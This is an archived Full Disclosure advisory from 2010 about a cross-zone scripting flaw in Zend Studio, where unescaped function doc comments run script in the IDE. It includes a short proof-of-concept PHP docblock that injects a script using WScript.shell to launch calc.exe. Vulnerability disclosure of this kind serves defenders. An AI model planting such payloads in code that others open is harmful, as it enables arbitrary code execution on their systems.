Full Disclosure mailing list archives
Zend studio location Cross-Domain Scripting Vulnerability
From: IEhrepus <5up3rh3i () gmail com>
Date: Sat, 10 Jul 2010 13:44:00 +0800
Author: www.80vul.com [Email: saiy1986 () gmail com] Release Date: 2010/7/10 References: http://80vul.com/Zend%20studio/Zend%20studio%20location%20Cross.htm Zend Studio is a commercial, proprietary integrated development environment (IDE) for PHP developed by Zend Technologies, based on the PHP Development Tools (PDT) plugin for the Eclipse platform (the PDT project is led by Zend). We found a security bug of it in Zend studio [version >6.0], the description of a function of php script does'nt be escaped or htmlencode, so it lead to can be exploited to execute arbitrary HTML and script code what the attacker inject evil codz on function’s description. And this vul is a “Cross-Zone Scripting” vul, so Successful exploitation allows execution of arbitrary code in user’s system. DEMO: <?php /** * <script>new ActiveXObject("WScript.shell").Run('calc.exe',1,true);</script>"); */ function a() { } Then Open the function a()’s description [type a word "a" or move your mouse on it] ,the calc.exe well be run. Disclosure Timeline: 2009/07/08 - Found this Vulnerability 2009/07/10 - Public Disclosure -- hitest
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Zend studio location Cross-Domain Scripting Vulnerability IEhrepus (Jul 09)